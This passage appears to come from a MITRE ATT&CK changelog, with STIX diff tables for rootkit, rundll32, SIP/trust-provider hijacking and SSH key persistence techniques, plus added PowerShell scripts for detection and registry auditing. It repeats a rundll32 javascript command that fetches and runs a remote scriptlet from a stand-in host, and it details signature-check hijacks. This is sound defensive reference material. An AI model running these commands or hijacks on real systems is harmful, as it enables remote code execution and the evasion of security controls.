| external_references[3]['url'] | https://en.wikipedia.org/wiki/Rootkit | https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf |
| external_references[4]['source_name'] | CrowdStrike Linux Rootkit | Wikipedia Rootkit |
| external_references[4]['description'] | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. | Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016. |
| external_references[4]['url'] | https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/ | https://en.wikipedia.org/wiki/Rootkit |
| external_references[5]['source_name'] | BlackHat Mac OSX Rootkit | capec |
| external_references[5]['url'] | http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf | https://capec.mitre.org/data/definitions/552.html |
| x_mitre_defense_bypassed[0] | File monitoring | Anti-virus |
| x_mitre_defense_bypassed[1] | Host intrusion prevention systems | File Monitoring |
| x_mitre_defense_bypassed[2] | Application control | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[3] | Signature-based detection | Application Control |
| x_mitre_defense_bypassed[4] | System access controls | Signature-based Detection |
| x_mitre_defense_bypassed[5] | Application control by file name or path | System Access Controls |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Anti-virus |
| Old Description | New Description |
|---|---|
| Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}). Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion) Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) |
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 21:45:53.057000+00:00 | 2022-04-19 18:12:39.357000+00:00 |
| description | Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) |
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).
Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) |
| external_references[1]['source_name'] | Trend Micro CPL | rundll32.exe defense evasion |
| external_references[1]['description'] | Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017. | Ariel silver. (2022, February 1). Defense Evasion Techniques. Retrieved April 8, 2022. |
| external_references[1]['url'] | https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf | https://www.cynet.com/attack-techniques-hands-on/defense-evasion-techniques/ |
| external_references[2]['source_name'] | This is Security Command Line Confusion | Attackify Rundll32.exe Obscurity |
| external_references[2]['description'] | B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018. | Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021. |
| external_references[2]['url'] | https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ | https://www.attackify.com/blog/rundll32_execution_order/ |
| external_references[3]['source_name'] | Attackify Rundll32.exe Obscurity | This is Security Command Line Confusion |
| external_references[3]['description'] | Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021. | B. Ancel. (2014, August 20). Poweliks – Command Line Confusion. Retrieved March 5, 2018. |
| external_references[3]['url'] | https://www.attackify.com/blog/rundll32_execution_order/ | https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/ |
| x_mitre_data_sources[0] | File: File Metadata | Process: Process Creation |
| x_mitre_data_sources[1] | Process: Process Creation | File: File Metadata |
| x_mitre_version | 1.1 | 2.0 |
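The rundll32.exe description (both the Old/New Description table and the description row above) lists several abuse patterns that a detection engineer can triage from process command lines: the javascript: protocol handler through mshtml,RunHTMLApplication, Control_RunDLL / Control_RunDLLAsUser with a .cpl outside System32, ordinal exports (#1), and modules with non-DLL extensions or outside the Windows directory. The following is an added example, not MITRE's or any cited vendor's code; the command lines are constructed samples standing in for Sysmon Event 1 or Security 4688 CommandLine fields.

```powershell
# Added example (not from the ATT&CK page): triage rundll32.exe command lines for
# the abuse patterns named in the technique text. All input lines are constructed.
$sampleCommandLines = @(
    'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl',
    'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://example.invalid/x.sct")',
    'rundll32.exe C:\Users\Public\update.dll,#1',
    'rundll32.exe C:\ProgramData\report.png,ExampleFunctionW',
    'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLLAsUser C:\Users\Public\look.cpl',
    'rundll32.exe C:\Windows\System32\user32.dll,LockWorkStation',
    'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\inetcpl.cpl,,4'
)

function Get-Rundll32Triage {
    param([string[]]$CommandLine)

    foreach ($line in $CommandLine) {
        $reasons = New-Object System.Collections.Generic.List[string]

        if ($line -match 'rundll32(\.exe)?\s+(javascript|vbscript):') {
            # Poweliks-style script execution via the mshtml RunHTMLApplication path.
            $reasons.Add('script protocol handler passed to rundll32 (mshtml,RunHTMLApplication)')
        }
        elseif ($line -match 'rundll32(\.exe)?\s+(?:"(?<mod>[^"]+)"|(?<mod>[^\s,]+))\s*,\s*(?<func>[^\s]+)') {
            # First argument is "<module>,<entry point>"; the module may be quoted.
            $module = $Matches['mod']
            $func   = $Matches['func']
            $inWinDir = $module -match '^[a-z]:\\windows\\(system32|syswow64)\\'

            # Ordinal export (rundll32 file.dll,#1) keeps the function name off the command line.
            if ($func -match '^#\d+$') { $reasons.Add("export called by ordinal $func") }

            # Masquerading: module renamed to a non-DLL extension, or a DLL dropped outside Windows.
            $ext = if ($module -match '\.([A-Za-z0-9]+)$') { '.' + $Matches[1] } else { '' }
            if ($ext -ne '.dll') { $reasons.Add("module has non-DLL extension '$ext'") }
            if (-not $inWinDir)   { $reasons.Add("module loaded from outside the Windows directory: $module") }

            # Control Panel item execution: flag .cpl files that are not in System32/SysWOW64.
            if ($func -match '^Control_RunDLL(AsUser)?$') {
                $cplArg = ($line -split '\s+')[-1]   # conventional position of the .cpl path
                if ($cplArg -match '\.cpl' -and $cplArg -notmatch '^[a-z]:\\windows\\(system32|syswow64)\\') {
                    $reasons.Add("Control Panel item outside System32: $cplArg")
                }
            }
        }

        [pscustomobject]@{
            CommandLine = $line
            Suspicious  = ($reasons.Count -gt 0)
            Reasons     = ($reasons -join '; ')
        }
    }
}

# Samples 1, 6 and 7 are benign system usage and come back Suspicious = False;
# the others each carry at least one reason.
Get-Rundll32Triage -CommandLine $sampleCommandLines | Format-Table -AutoSize -Wrap
```

The W/A suffix trick from the description is not visible on the command line at all; it needs export-table inspection of the loaded module (File: File Metadata in the data sources above), which is why the two data sources are paired.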
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Trend Micro CPL', 'description': 'Merces, F. (2014). CPL Malware Malicious Control Panel Items. Retrieved November 1, 2017.', 'url': 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'} | |
| x_mitre_contributors | James_inthe_box, Me |
| Old Description | New Description |
|---|---|
| Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. 
For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-28 23:10:34.359000+00:00 | 2022-03-25 19:24:18.545000+00:00 |
| description | Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. 
For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| x_mitre_data_sources[0] | Process: OS API Execution | File: File Deletion |
| x_mitre_data_sources[1] | File: File Creation | Process: OS API Execution |
| x_mitre_data_sources[2] | File: File Deletion | File: File Modification |
| x_mitre_data_sources[3] | File: File Modification | File: File Creation |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) |
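An audit of the three registration points named in the description (CryptSIPDllGetSignedDataMsg, CryptSIPDllVerifyIndirectData and Providers\Trust\FinalPolicy, in both the native and WOW6432Node views), flagging any entry whose DLL is missing, lives outside the Windows directory, or is not Microsoft-signed. This is an added example, not MITRE's code or the cited SpectorOps/GitHub material; it assumes Windows PowerShell 5.1 or later, and the `$DLL`/`$Function` value names under FinalPolicy are as observed on a stock Windows install, not taken from the page (which calls them DLL and Function).

```powershell
# Added example (not from the ATT&CK page): inventory SIP and trust provider
# registrations and flag DLLs that are not Microsoft-signed files under %SystemRoot%.
$sipRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg',
    'HKLM:\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
)
$trustRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy'
)

function Resolve-RegisteredDll {
    param([string]$Dll, [bool]$Wow64)
    # Values are normally bare file names (e.g. WINTRUST.DLL) that the loader resolves
    # from the system directory; an absolute path is unusual and is kept as written.
    $expanded = [Environment]::ExpandEnvironmentVariables($Dll)
    if ([System.IO.Path]::IsPathRooted($expanded)) { return $expanded }
    $sysDir = if ($Wow64) { "$env:SystemRoot\SysWOW64" } else { "$env:SystemRoot\System32" }
    return Join-Path $sysDir $expanded
}

function Test-RegisteredDll {
    param([string]$Path)
    $reasons = @()
    if (-not (Test-Path -LiteralPath $Path)) {
        # Dangling entry, or a DLL that only exists in a search-order hijack location.
        return @("file not found: $Path")
    }
    if ($Path -notlike "$env:SystemRoot\*") { $reasons += "outside Windows directory: $Path" }
    # Catalog-signed system DLLs report SignatureType 'Catalog' on current Windows.
    $sig = Get-AuthenticodeSignature -FilePath $Path
    if ($sig.Status -ne 'Valid') {
        $reasons += "signature status $($sig.Status)"
    } elseif ($sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
        $reasons += "signer: $($sig.SignerCertificate.Subject)"
    }
    return $reasons
}

function Get-SipTrustProviderAudit {
    foreach ($root in ($sipRoots + $trustRoots)) {
        if (-not (Test-Path $root)) { continue }
        $wow64 = $root -like '*WOW6432Node*'
        foreach ($key in Get-ChildItem -Path $root) {
            $p = Get-ItemProperty -Path $key.PSPath
            # SIP keys use 'Dll'/'FuncName'; FinalPolicy keys use '$DLL'/'$Function'
            # (the latter names are as observed on a stock system, not from the page).
            $dll  = if ($null -ne $p.Dll)      { $p.Dll }      else { $p.'$DLL' }
            $func = if ($null -ne $p.FuncName) { $p.FuncName } else { $p.'$Function' }
            if (-not $dll) { continue }
            $path    = Resolve-RegisteredDll -Dll $dll -Wow64 $wow64
            $reasons = @(Test-RegisteredDll -Path $path)
            [pscustomobject]@{
                Key        = $key.PSChildName        # the SIP or trust provider GUID
                Registered = "$dll!$func"
                Resolved   = $path
                Suspicious = ($reasons.Count -gt 0)
                Reasons    = ($reasons -join '; ')
            }
        }
    }
}

Get-SipTrustProviderAudit |
    Sort-Object Suspicious -Descending |
    Format-Table Key, Registered, Suspicious, Reasons -AutoSize -Wrap
```

Because Get-AuthenticodeSignature itself goes through WinVerifyTrust and these same SIPs, a hijacked CryptSIPDllVerifyIndirectData or FinalPolicy entry can lie to the signature check; export the Key and Registered columns from a known-good build and diff against them rather than trusting the signature result alone.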
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['SYSTEM', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:58:04.719000+00:00 | 2022-05-05 04:58:58.214000+00:00 |
| external_references[1]['source_name'] | Microsoft Authenticode | Entrust Enable CAPI2 Aug 2017 |
| external_references[1]['description'] | Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018. | Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018. |
| external_references[1]['url'] | https://msdn.microsoft.com/library/ms537359.aspx | http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 |
| external_references[2]['source_name'] | Microsoft WinVerifyTrust | GitHub SIP POC Sept 2017 |
| external_references[2]['description'] | Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018. | Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018. |
| external_references[2]['url'] | https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx | https://github.com/mattifestation/PoCSubjectInterfacePackage |
| external_references[4]['source_name'] | EduardosBlog SIPs July 2008 | Microsoft Catalog Files and Signatures April 2017 |
| external_references[4]['description'] | Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018. | Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018. |
| external_references[4]['url'] | https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ | https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files |
| external_references[5]['source_name'] | Microsoft Catalog Files and Signatures April 2017 | Microsoft Audit Registry July 2012 |
| external_references[5]['description'] | Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018. | Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018. |
| external_references[5]['url'] | https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) |
| external_references[6]['source_name'] | GitHub SIP POC Sept 2017 | Microsoft Registry Auditing Aug 2016 |
| external_references[6]['description'] | Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018. | Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018. |
| external_references[6]['url'] | https://github.com/mattifestation/PoCSubjectInterfacePackage | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) |
| external_references[7]['source_name'] | Entrust Enable CAPI2 Aug 2017 | Microsoft Authenticode |
| external_references[7]['description'] | Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018. | Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018. |
| external_references[7]['url'] | http://www.entrust.net/knowledge-base/technote.cfm?tn=8165 | https://msdn.microsoft.com/library/ms537359.aspx |
| external_references[8]['source_name'] | Microsoft Registry Auditing Aug 2016 | Microsoft WinVerifyTrust |
| external_references[8]['description'] | Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018. | Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018. |
| external_references[8]['url'] | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11) | https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx |
| external_references[9]['source_name'] | Microsoft Audit Registry July 2012 | EduardosBlog SIPs July 2008 |
| external_references[9]['description'] | Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018. | Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018. |
| external_references[9]['url'] | https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10) | https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/ |
| x_mitre_data_sources[0] | Module: Module Load | File: File Modification |
| x_mitre_data_sources[2] | File: File Modification | Module: Module Load |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control |
| Old Description | New Description |
|---|---|
Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) |
Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
